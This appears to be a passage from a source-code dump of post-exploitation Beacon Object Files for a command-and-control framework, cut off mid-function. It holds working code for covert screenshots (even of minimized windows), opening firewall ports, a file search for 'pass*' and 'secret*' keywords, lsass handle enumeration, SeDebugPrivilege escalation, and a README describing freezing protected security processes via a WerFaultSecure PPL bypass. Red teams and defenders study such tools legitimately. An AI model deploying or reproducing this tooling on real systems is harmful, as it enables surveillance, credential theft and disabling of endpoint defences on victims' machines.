DECLSPEC_IMPORT GpStatus WINAPI GDIPLUS$GdipDisposeImage(GpImage* image);
DECLSPEC_IMPORT GpStatus WINAPI GDIPLUS$GdipSaveImageToStream(GpImage* image, IStream* stream, const CLSID* clsidEncoder, const EncoderParameters* encoderParams);

BOOL BitmapToJpeg(HBITMAP hBitmap, int quality, BYTE** pJpegData, DWORD* pJpegSize) {
    GdiplusStartupInput gdiplusInput = { 0 };
    gdiplusInput.GdiplusVersion = 1;

    ULONG_PTR token;
    if (GDIPLUS$GdiplusStartup(&token, &gdiplusInput, NULL) != Ok) return FALSE;

    GpBitmap* bmp = NULL;
    if (GDIPLUS$GdipCreateBitmapFromHBITMAP(hBitmap, NULL, &bmp) != Ok) {
        GDIPLUS$GdiplusShutdown(token);
        return FALSE;
    }

    IStream* stream = NULL;
    if (OLE32$CreateStreamOnHGlobal(NULL, TRUE, &stream) != S_OK) {
        GDIPLUS$GdipDisposeImage((GpImage*)bmp);
        GDIPLUS$GdiplusShutdown(token);
        return FALSE;
    }

    EncoderParameters params;
    params.Count = 1;
    CLSID clsidEncoderQuality = { 0x1d5be4b5, 0xfa4a, 0x452d, {0x9c,0xdd,0x5d,0xb3,0x51,0x05,0xe7,0xeb} };
    params.Parameter[0].Guid = clsidEncoderQuality;
    params.Parameter[0].NumberOfValues = 1;
    params.Parameter[0].Type = EncoderParameterValueTypeLong;
    params.Parameter[0].Value = &quality;

    CLSID clsidJPEG = { 0x557cf401, 0x1a04, 0x11d3, { 0x9a, 0x73, 0x00, 0x00, 0xf8, 0x1e, 0xf3, 0x2e } };
    if (GDIPLUS$GdipSaveImageToStream((GpImage*)bmp, stream, &clsidJPEG, &params) != Ok) {
        stream->lpVtbl->Release(stream);
        GDIPLUS$GdipDisposeImage((GpImage*)bmp);
        GDIPLUS$GdiplusShutdown(token);
        return FALSE;
    }

    ULARGE_INTEGER ulSize;
    LARGE_INTEGER liZero = {0};
    stream->lpVtbl->Seek(stream, liZero, STREAM_SEEK_END, &ulSize);
    *pJpegSize = (DWORD)ulSize.QuadPart;

    *pJpegData = (BYTE*)MSVCRT$malloc(*pJpegSize);
    if (!*pJpegData) {
        stream->lpVtbl->Release(stream);
        GDIPLUS$GdipDisposeImage((GpImage*)bmp);
        GDIPLUS$GdiplusShutdown(token);
        return FALSE;
    }

    stream->lpVtbl->Seek(stream, liZero, STREAM_SEEK_SET, NULL);
    ULONG bytesRead = 0;
    stream->lpVtbl->Read(stream, *pJpegData, *pJpegSize, &bytesRead);

    stream->lpVtbl->Release(stream);
    GDIPLUS$GdipDisposeImage((GpImage*)bmp);
    GDIPLUS$GdiplusShutdown(token);

    return (bytesRead == *pJpegSize);
}

BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR note) {
    BYTE* data;
    DWORD size;
    if (!BitmapToJpeg(hBitmap, 90, &data, &size)) return FALSE;
    AxAddScreenshot((char*)note, (char*)data, (int)size);
    MSVCRT$free(data);
    return TRUE;
}

BOOL CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam) {
    struct EnumData {
        DWORD pid;
        HWND hwnd;
    };

    struct EnumData* data = (struct EnumData*)lParam;
    DWORD windowPid = 0;
    USER32$GetWindowThreadProcessId(hwnd, &windowPid);

    if (windowPid == data->pid && USER32$IsWindowVisible(hwnd)) {
        data->hwnd = hwnd;
        return FALSE;
    }
    return TRUE;
}

HWND FindWindowByPID(DWORD pid) {
    struct EnumData {
        DWORD pid;
        HWND hwnd;
    } data = { pid, NULL };

    USER32$EnumWindows(EnumWindowsProc, (LPARAM)&data);
    return data.hwnd;
}

HBITMAP CaptureWindow(HWND hwnd) {
    WINDOWPLACEMENT wp = { sizeof(wp) };
    if (!USER32$GetWindowPlacement(hwnd, &wp)) {
        BeaconPrintf(CALLBACK_ERROR, "GetWindowPlacement failed");
        return NULL;
    }

    RECT captureRect;
    int width, height;
    BOOL success = FALSE;
    HDC hdcScreen = USER32$GetDC(NULL);
    HDC hdcMem = GDI32$CreateCompatibleDC(hdcScreen);
    HBITMAP hBitmap = NULL;

    if (wp.showCmd == SW_SHOWMINIMIZED) {
        LONG exStyle = USER32$GetWindowLongA(hwnd, GWL_EXSTYLE);
        USER32$SetWindowLongA(hwnd, GWL_EXSTYLE, exStyle | WS_EX_LAYERED | WS_EX_TOOLWINDOW);
        USER32$SetLayeredWindowAttributes(hwnd, 0, 0, LWA_ALPHA);
        USER32$ShowWindow(hwnd, SW_RESTORE);
        USER32$UpdateWindow(hwnd);
        KERNEL32$Sleep(1000);  /* Allow time for rendering */

        if (!USER32$GetWindowRect(hwnd, &captureRect)) {
            BeaconPrintf(CALLBACK_ERROR, "GetWindowRect failed (restored window)");
            goto cleanup;
        }

        width = captureRect.right - captureRect.left;
        height = captureRect.bottom - captureRect.top;
        if (width <= 0 || height <= 0) {
            BeaconPrintf(CALLBACK_ERROR, "Invalid window dimensions SW_SHOWMINIMIZED");
            goto cleanup;
        }
        hBitmap = GDI32$CreateCompatibleBitmap(hdcScreen, width, height);
        if (!hBitmap) {
            BeaconPrintf(CALLBACK_ERROR, "Failed to create compatible bitmap");
            goto cleanup;
        }
        GDI32$SelectObject(hdcMem, hBitmap);
        success = USER32$PrintWindow(hwnd, hdcMem, PW_RENDERFULLCONTENT);
        if (!success) {
            success = GDI32$BitBlt(hdcMem, 0, 0, width, height,
                hdcScreen, captureRect.left, captureRect.top, SRCCOPY);
            if (!success)
                BeaconPrintf(CALLBACK_ERROR, "Both PrintWindow and BitBlt failed");
        }

        USER32$ShowWindow(hwnd, SW_MINIMIZE);
        USER32$SetWindowLongA(hwnd, GWL_EXSTYLE, exStyle);
        USER32$SetWindowPos(hwnd, NULL, 0, 0, 0, 0, SWP_NOMOVE | SWP_NOSIZE | SWP_NOZORDER | SWP_FRAMECHANGED);
    } else {
        if (!USER32$GetWindowRect(hwnd, &captureRect)) {
            BeaconPrintf(CALLBACK_ERROR, "GetWindowRect failed");
            goto cleanup;
        }

        width = captureRect.right - captureRect.left;
        height = captureRect.bottom - captureRect.top;
        if (width <= 0 || height <= 0) {
            BeaconPrintf(CALLBACK_ERROR, "Invalid window dimensions ");
            goto cleanup;
        }
        hBitmap = GDI32$CreateCompatibleBitmap(hdcScreen, width, height);
        if (!hBitmap) {
            BeaconPrintf(CALLBACK_ERROR, "Failed to create compatible bitmap");
            goto cleanup;
        }
        GDI32$SelectObject(hdcMem, hBitmap);

        success = USER32$PrintWindow(hwnd, hdcMem, PW_RENDERFULLCONTENT);
        if (!success) {
            success = GDI32$BitBlt(hdcMem, 0, 0, width, height, hdcScreen, captureRect.left, captureRect.top, SRCCOPY);
            if (!success)
                BeaconPrintf(CALLBACK_ERROR, "Both PrintWindow and BitBlt failed");
        }
    }

cleanup:
    if (hdcMem)
        GDI32$DeleteDC(hdcMem);
    if (hdcScreen)
        USER32$ReleaseDC(NULL, hdcScreen);
    if (!success) {
        if (hBitmap)
            GDI32$DeleteObject(hBitmap);
        return NULL;
    }
    return hBitmap;
}


void go(char* buff, int len) {
    datap parser;
    BeaconDataParse(&parser, buff, len);
    char* note = BeaconDataExtract(&parser, NULL);
    int pid    = BeaconDataInt(&parser);

    USER32$SetProcessDPIAware();

    HBITMAP bmp = NULL;
    if (pid != 0) {
        HWND hwnd = FindWindowByPID((DWORD)pid);
        if (!hwnd) {
            BeaconPrintf(CALLBACK_ERROR, "Window with PID %d not found", pid);
            return;
        }
        bmp = CaptureWindow(hwnd);
        if (!bmp) {
            BeaconPrintf(CALLBACK_ERROR, "Failed to capture window with PID %d", pid);
            return;
        }
    } else {
        int x = USER32$GetSystemMetrics(SM_XVIRTUALSCREEN);
        int y = USER32$GetSystemMetrics(SM_YVIRTUALSCREEN);
        int w = USER32$GetSystemMetrics(SM_CXVIRTUALSCREEN);
        int h = USER32$GetSystemMetrics(SM_CYVIRTUALSCREEN);

        HDC screenDC = USER32$GetDC(NULL);
        if (screenDC == NULL) {
            BeaconPrintf(CALLBACK_ERROR, "GetDC(NULL) returned NULL. Error: %lu", KERNEL32$GetLastError());
            return;
        }

        HDC memDC = GDI32$CreateCompatibleDC(screenDC);
        if (memDC == NULL) {
            BeaconPrintf(CALLBACK_ERROR, "CreateCompatibleDC failed. Error: %lu", KERNEL32$GetLastError());
            USER32$ReleaseDC(NULL, screenDC);
            return;
        }

        bmp = GDI32$CreateCompatibleBitmap(screenDC, w, h);
        if (bmp == NULL) {
            BeaconPrintf(CALLBACK_ERROR, "Failed to create full screen bitmap");
            GDI32$DeleteDC(memDC);
            USER32$ReleaseDC(NULL, screenDC);
            return;
        }

        GDI32$SelectObject(memDC, bmp);
        if (!GDI32$BitBlt(memDC, 0, 0, w, h, screenDC, x, y, SRCCOPY)) {
            BeaconPrintf(CALLBACK_ERROR, "Full screen BitBlt failed: %lu", KERNEL32$GetLastError());
        }
        GDI32$DeleteDC(memDC);
        USER32$ReleaseDC(NULL, screenDC);
    }

    if (bmp) {
        if (!SaveHBITMAPToFile(bmp, note)) {
            BeaconPrintf(CALLBACK_ERROR, "Failed to save JPEG");
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "Screenshot saved successfully");
        }
        GDI32$DeleteObject(bmp);
    }
}

================================================
FILE: Postex-BOF/firewallrule/addfirewallrule.c
================================================
#include <stdio.h>
#include <windows.h>
#include <netfw.h>
#include "firewallrule.h"
#include "beacon.h"

#pragma comment(lib, "comsuppw.lib")
#pragma comment(lib, "Ole32.lib")
#pragma comment(lib, "OleAut32.lib")


HRESULT AddFirewallRule(BSTR ruleName, BSTR ruleDescription, BSTR ruleGroup, NET_FW_RULE_DIRECTION direction, BSTR localPorts, LONG protocol) {
    HRESULT hr = S_OK;

    INetFwPolicy2 *pNetFwPolicy2 = NULL;
    INetFwRules *pRules = NULL;
    INetFwRule *pRule = NULL;
	
	// Initialize COM.
    hr = OLE32$CoInitializeEx(NULL, COINIT_MULTITHREADED);
    if (FAILED(hr)) goto Cleanup;

    // Create an instance of the firewall settings manager.
    IID CLSIDNetFwPolicy2 = {0xe2b3c97f, 0x6ae1, 0x41ac, {0x81, 0x7a, 0xf6, 0xf9, 0x21, 0x66, 0xd7, 0xdd}};
    IID IIDINetFwPolicy2 = {0x98325047, 0xc671, 0x4174, {0x8d, 0x81, 0xde, 0xfc, 0xd3, 0xf0, 0x31, 0x86}};
    hr = OLE32$CoCreateInstance(&CLSIDNetFwPolicy2, NULL, CLSCTX_INPROC_SERVER, &IIDINetFwPolicy2, (void**)&pNetFwPolicy2);
    if (FAILED(hr)) goto Cleanup;

    // Retrieve the firewall rules collection.
    hr = pNetFwPolicy2->lpVtbl->get_Rules(pNetFwPolicy2, &pRules);
    if (FAILED(hr)) goto Cleanup;

    // Create a new rule object.
    IID CLSIDNetFwRule = {0x2c5bc43e, 0x3369, 0x4c33, {0xab, 0x0c, 0xbe, 0x94, 0x69, 0x67, 0x7a, 0xf4}};
	IID IIDINetFwRule = {0xaf230d27, 0xbaba, 0x4e42, {0xac, 0xed, 0xf5, 0x24, 0xf2, 0x2c, 0xfc, 0xe2}};
    hr = OLE32$CoCreateInstance(&CLSIDNetFwRule, NULL, CLSCTX_INPROC_SERVER, &IIDINetFwRule, (void**)&pRule);
    if (FAILED(hr)) goto Cleanup;

	pRule->lpVtbl->put_Direction(pRule, direction);
	pRule->lpVtbl->put_Protocol(pRule, protocol);
	pRule->lpVtbl->put_LocalPorts(pRule, localPorts);
	pRule->lpVtbl->put_Action(pRule, NET_FW_ACTION_ALLOW);
    pRule->lpVtbl->put_Profiles(pRule, NET_FW_PROFILE2_ALL);
    pRule->lpVtbl->put_Name(pRule, ruleName);
    pRule->lpVtbl->put_Description(pRule, ruleDescription);
    pRule->lpVtbl->put_Grouping(pRule, ruleGroup);
    pRule->lpVtbl->put_Enabled(pRule, VARIANT_TRUE);

    // Add the rule.
    hr = pRules->lpVtbl->Add(pRules, pRule);
    if (FAILED(hr)) goto Cleanup;

Cleanup:
    if (pRule) pRule->lpVtbl->Release(pRule);
    if (pRules) pRules->lpVtbl->Release(pRules);
    if (pNetFwPolicy2) pNetFwPolicy2->lpVtbl->Release(pNetFwPolicy2);

    OLE32$CoUninitialize();
    return hr;
}


int go(char *args, int len) {
	HRESULT hr;
	datap parser;
	CHAR *directionOption = "in"; //in | out
	WCHAR *w_ruleName = NULL;
    WCHAR *w_ruleDescription = NULL;
    WCHAR *w_ruleGroup = NULL;
    WCHAR *w_localPorts = NULL;

	BeaconDataParse(&parser, args, len);
	directionOption = BeaconDataExtract(&parser, NULL);
	w_localPorts = (wchar_t*) BeaconDataExtract(&parser, NULL);
	w_ruleName = (wchar_t*) BeaconDataExtract(&parser, NULL);
	w_ruleGroup = (wchar_t*) BeaconDataExtract(&parser, NULL);
	w_ruleDescription =  (wchar_t*) BeaconDataExtract(&parser, NULL);
	
	
	LONG protocol = NET_FW_IP_PROTOCOL_TCP;
    BSTR ruleName = OLEAUT32$SysAllocString(w_ruleName);
    BSTR ruleDescription = OLEAUT32$SysAllocString(w_ruleDescription);
    BSTR ruleGroup = OLEAUT32$SysAllocString(w_ruleGroup);
    BSTR localPorts = OLEAUT32$SysAllocString(w_localPorts);
    
	if(MSVCRT$strcmp(directionOption, "in") == 0) {
		NET_FW_RULE_DIRECTION direction = NET_FW_RULE_DIR_IN;
		hr = AddFirewallRule(ruleName, ruleDescription, ruleGroup, direction, localPorts, protocol);
		if (SUCCEEDED(hr)) BeaconPrintf(CALLBACK_OUTPUT, "[+] Inbound firewall rule added successfully.\n");
        else BeaconPrintf(CALLBACK_ERROR, "Add failed: 0x%08lx\n", hr);
	} 
	else {
		NET_FW_RULE_DIRECTION direction = NET_FW_RULE_DIR_OUT;
		hr = AddFirewallRule(ruleName, ruleDescription, ruleGroup, direction, localPorts, protocol);
		if (SUCCEEDED(hr)) BeaconPrintf(CALLBACK_OUTPUT, "[+] Outbound firewall rule added successfully.\n");
        else BeaconPrintf(CALLBACK_ERROR, "Add failed: 0x%08lx\n", hr);
	}

    OLEAUT32$SysFreeString(ruleName);
    OLEAUT32$SysFreeString(ruleDescription);
    OLEAUT32$SysFreeString(ruleGroup);
    OLEAUT32$SysFreeString(localPorts);

    return 0;
}

================================================
FILE: Postex-BOF/firewallrule/firewallrule.h
================================================
#include <windows.h>

//AddFirewallRule
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID pvReserved, DWORD dwCoInit);
DECLSPEC_IMPORT void WINAPI OLE32$CoUninitialize(void);
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance (REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID *ppv);
WINBASEAPI BSTR WINAPI OLEAUT32$SysAllocString(const OLECHAR *);
WINBASEAPI void WINAPI OLEAUT32$SysFreeString(BSTR);
WINBASEAPI int __cdecl MSVCRT$printf(const char * _Format,...);
WINBASEAPI int __cdecl MSVCRT$strcmp(const char *str1, const char *str2);

================================================
FILE: Postex-BOF/postex.axs
================================================
var metadata = {
    name: "PostEx-BOF",
    description: "BOFs for post exploitation"
};

/// COMMANDS

var _cmd_fw_add = ax.create_command("add", "Add a new inbound or outbound firewall rule using COM", "firewallrule add 80 RuleName in -g Group1 -d TestRule");
_cmd_fw_add.addArgString("port", true);
_cmd_fw_add.addArgString("rulename", true);
_cmd_fw_add.addArgString("direction", "", "in");
_cmd_fw_add.addArgFlagString("-g", "rulegroup", "", "");
_cmd_fw_add.addArgFlagString("-d", "description", "", "");
_cmd_fw_add.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let direction   = parsed_json["direction"];
    let port        = parsed_json["port"];
    let rulename    = parsed_json["rulename"];
    let rulegroup   = parsed_json["rulegroup"];
    let description = parsed_json["description"];

    let bof_params = ax.bof_pack("cstr,wstr,wstr,wstr,wstr", [direction, port, rulename, rulegroup, description]);
    let bof_path = ax.script_dir() + "_bin/addfirewallrule." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Task: Add firewall rule (BOF)");
});
var cmd_fw = ax.create_command("firewallrule", "Managing firewall rules");
cmd_fw.addSubCommands([_cmd_fw_add]);







var cmd_screenshot = ax.create_command("screenshot_bof", "Alternative screenshot capability that does not do fork n run by @codex_tf2", "screenshot -n screen1 -p 812");
cmd_screenshot.addArgFlagString("-n", "note", "Screenshot caption", "ScreenshotBOF");
cmd_screenshot.addArgFlagInt("-p", "pid", "PID of the application whose window screenshot will be taken. If 0, then a full-screen screenshot", 0);
cmd_screenshot.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let note = parsed_json["note"];
    let pid  = parsed_json["pid"];

    let bof_params = ax.bof_pack("cstr,int", [note, pid]);
    let bof_path = ax.script_dir() + "_bin/Screenshot." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Task: Screenshot BOF");
});



var cmd_sauroneye = ax.create_command("sauroneye", "Search directories for files containing specific keywords (SauronEye ported to BOF by @shashinma)", "sauroneye -d C:\\Users -f .txt,.docx -k pass*,secret*");
cmd_sauroneye.addArgBool("--async", "Use Async BOF");
cmd_sauroneye.addArgFlagString("-d", "directories", "Comma-separated list of directories to search (default: C:\\)", "C:\\");
cmd_sauroneye.addArgFlagString("-f", "filetypes", "Comma-separated list of file extensions to search (default: .txt,.docx)", ".txt,.docx");
cmd_sauroneye.addArgFlagString("-k", "keywords", "Comma-separated list of keywords (supports wildcards * ). If not specified, matches all filenames", "");
cmd_sauroneye.addArgBool("-c", "Search file contents for keywords (supports wildcards * )");
cmd_sauroneye.addArgFlagInt("-m", "maxfilesize", "Max file size to search contents in, in kilobytes (default: 1024)", 1024);
cmd_sauroneye.addArgBool("-s",                      "Search in system directories (Windows and AppData)");
cmd_sauroneye.addArgFlagString("-b", "beforedate",  "Filter files last modified before this date (format: dd.MM.yyyy)", "");
cmd_sauroneye.addArgFlagString("-a", "afterdate",   "Filter files last modified after this date (format: dd.MM.yyyy)", "");
cmd_sauroneye.addArgBool("-v",                      "Check if Office files contain VBA macros using OOXML detection (no OLE, stealthier)");
cmd_sauroneye.addArgBool("-D", "Show file creation and modification dates in output (format: [C:dd.MM.yyyy M:dd.MM.yyyy])");
cmd_sauroneye.addArgFlagInt("-W", "wildcardattempts", "Maximum pattern matching attempts for wildcard search (default: 1000). Increase for complex patterns", 1000);
cmd_sauroneye.addArgFlagInt("-S", "wildcardsize", "Maximum search area in KB for large files when using wildcards (default: 200KB). Increase to search more", 200);
cmd_sauroneye.addArgFlagInt("-B", "wildcardbacktrack", "Maximum backtracking operations for wildcard matching (default: 1000). Increase for complex patterns", 1000);
cmd_sauroneye.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let directories = parsed_json["directories"];
    let filetypes = parsed_json["filetypes"];
    let keywords = parsed_json["keywords"];
    let search_contents = (parsed_json["-c"]) ? 1 : 0;
    let max_filesize = parsed_json["maxfilesize"];
    let system_dirs = (parsed_json["-s"]) ? 1 : 0;
    let before_date = parsed_json["beforedate"];
    let after_date = parsed_json["afterdate"];
    let check_macro = (parsed_json["-v"]) ? 1 : 0;
    let show_date = (parsed_json["-D"]) ? 1 : 0;
    let wildcard_attempts = parsed_json["wildcardattempts"];
    let wildcard_size = parsed_json["wildcardsize"];
    let wildcard_backtrack = parsed_json["wildcardbacktrack"];
    let async = "";
    if (parsed_json["--async"]) async = "-a ";

    let bof_params = ax.bof_pack("cstr,cstr,cstr,cstr,int,int,int,cstr,cstr,int,int,int,int,int", [cmdline, directories, filetypes, keywords, search_contents, max_filesize, system_dirs, before_date, after_date, check_macro, show_date, wildcard_attempts, wildcard_size, wildcard_backtrack]);
    let bof_path = ax.script_dir() + "_bin/sauroneye." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof ${async}"${bof_path}" ${bof_params}`, "Task: SauronEye file search");
});



var b_group_test = ax.create_commands_group("PostEx-BOF", [cmd_fw, cmd_screenshot, cmd_sauroneye]);
ax.register_commands_group(b_group_test, ["beacon", "gopher", "kharon"], ["windows"], []);

/// MENU

let screen_access_action = menu.create_action("Screenshot", function(agents_id) { agents_id.forEach(id => ax.execute_command(id, "screenshot_bof")) });
menu.add_session_access(screen_access_action, ["beacon"]);
let g_screen_access_action = menu.create_action("Screenshot", function(agents_id) { agents_id.forEach(id => ax.execute_command(id, "screenshot")) });
menu.add_session_access(g_screen_access_action, ["gopher"]);


================================================
FILE: Process-BOF/CMakeLists.txt
================================================
cmake_minimum_required(VERSION 3.16)
#project(Process-BOF C)

set(CMAKE_C_STANDARD 99)

# Include directories (main _include is at root level)
include_directories(
    ${CMAKE_SOURCE_DIR}/_include
#    ${CMAKE_CURRENT_SOURCE_DIR}/process
)

# Source files
set(FINDMODULE_SOURCES findobjects/FindModule.c)
set(FINDPROCHANDLE_SOURCES findobjects/FindProcHandle.c)
set(PSC_SOURCES process/psc.c)
set(PROCFREEZE_SOURCES procfreeze/procfreeze.c)

# Compiler flags
set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -Os -w -Wno-incompatible-pointer-types -DBOF")
set(CMAKE_C_FLAGS_RELEASE "${CMAKE_C_FLAGS_RELEASE} -s")

# Object file targets
add_library(findmodule OBJECT ${FINDMODULE_SOURCES})
target_compile_options(findmodule PRIVATE -masm=intel)

add_library(findprochandle OBJECT ${FINDPROCHANDLE_SOURCES})
target_compile_options(findprochandle PRIVATE -masm=intel)

add_library(psc OBJECT ${PSC_SOURCES})
target_compile_options(psc PRIVATE -masm=intel)

add_library(procfreeze OBJECT ${PROCFREEZE_SOURCES})
target_compile_options(procfreeze PRIVATE -masm=intel)

# Create _bin directory
file(MAKE_DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR}/_bin)

# Custom commands to copy object files to _bin
add_custom_target(copy_findmodule ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:findmodule> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/findmodule.x64.o
    DEPENDS findmodule
    COMMENT "Copying findmodule object file"
)

add_custom_target(copy_findprochandle ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:findprochandle> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/findprochandle.x64.o
    DEPENDS findprochandle
    COMMENT "Copying findprochandle object file"
)

add_custom_target(copy_psc ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:psc> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/psc.x64.o
    DEPENDS psc
    COMMENT "Copying psc object file"
)

add_custom_target(copy_procfreeze ALL
        COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:procfreeze> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/procfreeze.x64.o
        DEPENDS procfreeze
        COMMENT "Copying procfreeze object file"
)

================================================
FILE: Process-BOF/Makefile
================================================
CC64 = x86_64-w64-mingw32-gcc
CC86 = i686-w64-mingw32-gcc
STRIP64 = x86_64-w64-mingw32-strip --strip-unneeded
STRIP86 = x86_64-w64-mingw32-strip --strip-unneeded
CFLAGS = -I ../_include -masm=intel -w -Wno-incompatible-pointer-types -Os -DBOF -c

all: bof

bof: clean
	@(mkdir _bin 2>/dev/null) && echo 'creating _bin directory' || echo '_bin directory exists'
	@($(CC64) $(CFLAGS) findobjects/FindModule.c -o _bin/findmodule.x64.o && $(STRIP64) _bin/findmodule.x64.o) && echo '[+] findmodule' || echo '[!] findmodule'
	@($(CC64) $(CFLAGS) findobjects/FindProcHandle.c -o _bin/findprochandle.x64.o && $(STRIP64) _bin/findprochandle.x64.o) && echo '[+] findprochandle' || echo '[!] findprochandle'
	@($(CC64) $(CFLAGS) process/psc.c -o _bin/psc.x64.o && $(STRIP64) _bin/psc.x64.o) && echo '[+] psc' || echo '[!] psc'
	@($(CC64) $(CFLAGS) procfreeze/procfreeze.c -o _bin/procfreeze.x64.o && $(STRIP64) _bin/procfreeze.x64.o) && echo '[+] procfreeze' || echo '[!] procfreeze'

clean:
	@(rm -rf _bin)


================================================
FILE: Process-BOF/README.md
================================================
# Process-BOF

This extension increases situational awareness of processes, modules, and services by providing a set of Beacon Object File (BOF) commands.

![](_img/01.png)

## findobj

Enumerate processes for specific modules or process handles. Taken from [outflanknl/C2-Tool-Collection](https://github.com/outflanknl/C2-Tool-Collection/tree/main/BOF/FindObjects)

```
findobj <type> <name>
```

| Type         | Description                                                                                    |
|--------------|------------------------------------------------------------------------------------------------|
| `module`     | Enumerate processes for specific loaded modules (eg. `winhttp.dll`, `amsi.dll` or  `clr.dll`). |
| `prochandle` | Enumerate processes for specific process handles (eg. `lsass.exe`).                            |

![](_img/02.png)



## process

Show detailed information from processes with established TCP and RDP connections.

```
process conn
```



## procfreeze

Process freeze/unfreeze using PPL bypass technique via WerFaultSecure.exe.

```
procfreeze freeze <pid>
procfreeze unfreeze
```

Requirements:
- Elevated privileges (SYSTEM or Administrator)
- SeDebugPrivilege enabled
- Windows 10/11 with WerFaultSecure.exe

**Unfreeze may not work on Windows 10**. 

The target process may remain frozen after running `pf unfreeze`. In such cases, you will need to manually terminate the WerFaultSecure.exe process or reboot the system.



## Credits
* C2-Tool-Collection - https://github.com/outflanknl/C2-Tool-Collection
* ColdWer - https://github.com/0xsh3llf1r3/ColdWer
* EDR-Freeze - https://github.com/TwoSevenOneT/EDR-Freeze

================================================
FILE: Process-BOF/findobjects/FindModule.c
================================================
#include <windows.h>
#include <stdio.h>

#if defined(WOW64)
#include "Syscalls-WoW64.h"
#else
#include "Syscalls.h"
#endif

#include "FindObjects.h"
#include "beacon.h"

INT iGarbage = 1;
LPSTREAM lpStream = (LPSTREAM)1;

HRESULT BeaconPrintToStreamW(_In_z_ LPCWSTR lpwFormat, ...) {
	HRESULT hr = S_OK;
	va_list argList;
	WCHAR chBuffer[1024];
	DWORD dwWritten = 0;

	if (lpStream <= (LPSTREAM)1) {
		hr = OLE32$CreateStreamOnHGlobal(NULL, TRUE, &lpStream);
		if (FAILED(hr)) {
			return hr;
		}
	}

	va_start(argList, lpwFormat);
	MSVCRT$memset(chBuffer, 0, sizeof(chBuffer));
	if (!MSVCRT$_vsnwprintf_s(chBuffer, _countof(chBuffer), _TRUNCATE, lpwFormat, argList)) {
		hr = E_FAIL;
		goto CleanUp;
	}

	if (FAILED(hr = lpStream->lpVtbl->Write(lpStream, chBuffer, (ULONG)MSVCRT$wcslen(chBuffer) * sizeof(WCHAR), &dwWritten))) {
		goto CleanUp;
	}

CleanUp:

	va_end(argList);
	return hr;
}

VOID BeaconOutputStreamW() {
	STATSTG ssStreamData = { 0 };
	SIZE_T cbSize = 0;
	ULONG cbRead = 0;
	LARGE_INTEGER pos;
	LPWSTR lpwOutput = NULL;

	if (FAILED(lpStream->lpVtbl->Stat(lpStream, &ssStreamData, STATFLAG_NONAME))) {
		return;
	}

	cbSize = ssStreamData.cbSize.LowPart;
	lpwOutput = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, cbSize + 1);
	if (lpwOutput != NULL) {
		pos.QuadPart = 0;
		if (FAILED(lpStream->lpVtbl->Seek(lpStream, pos, STREAM_SEEK_SET, NULL))) {
			goto CleanUp;
		}

		if (FAILED(lpStream->lpVtbl->Read(lpStream, lpwOutput, (ULONG)cbSize, &cbRead))) {		
			goto CleanUp;
		}

		BeaconPrintf(CALLBACK_OUTPUT, "%ls", lpwOutput);
	}

CleanUp:

	if (lpStream != NULL) {
		lpStream->lpVtbl->Release(lpStream);
		lpStream = NULL;
	}

	if (lpwOutput != NULL) {
		KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, lpwOutput);
	}

	return;
}

BOOL IsProcessWoW64(_In_ HANDLE hProcess) {
	NTSTATUS status;
	ULONG_PTR IsWow64 = 0;

	status = ZwQueryInformationProcess(hProcess, ProcessWow64Information, &IsWow64, sizeof(ULONG_PTR), NULL);
	if (status != STATUS_SUCCESS) {
		return FALSE;
	}

	if (IsWow64 == 0) {
		return FALSE;
	}

	return TRUE;
}

BOOL IsElevated() {
	BOOL fRet = FALSE;
	HANDLE hToken = NULL;

	_NtOpenProcessToken NtOpenProcessToken = (_NtOpenProcessToken)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtOpenProcessToken");
	if (NtOpenProcessToken == NULL) {
		return FALSE;
	}

	NTSTATUS status = NtOpenProcessToken(NtCurrentProcess(), TOKEN_QUERY, &hToken);
	if (status == STATUS_SUCCESS) {
		TOKEN_ELEVATION Elevation = { 0 };
		ULONG ReturnLength;

		status = ZwQueryInformationToken(hToken, TokenElevation, &Elevation, sizeof(Elevation), &ReturnLength);
		if (status == STATUS_SUCCESS) {
			fRet = Elevation.TokenIsElevated;
		}
	}

	if (hToken != NULL) {
		ZwClose(hToken);
	}

	return fRet;
}

BOOL SetDebugPrivilege() {
	HANDLE hToken = NULL;
	TOKEN_PRIVILEGES TokenPrivileges = { 0 };

	_NtOpenProcessToken NtOpenProcessToken = (_NtOpenProcessToken)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtOpenProcessToken");
	if (NtOpenProcessToken == NULL) {
		return FALSE;
	}

	NTSTATUS status = NtOpenProcessToken(NtCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken);
	if (status != STATUS_SUCCESS) {
		return FALSE;
	}

	TokenPrivileges.PrivilegeCount = 1;
	TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

	LPCWSTR lpwPriv = L"SeDebugPrivilege";
	if (!ADVAPI32$LookupPrivilegeValueW(NULL, lpwPriv, &TokenPrivileges.Privileges[0].Luid)) {
		ZwClose(hToken);
		return FALSE;
	}

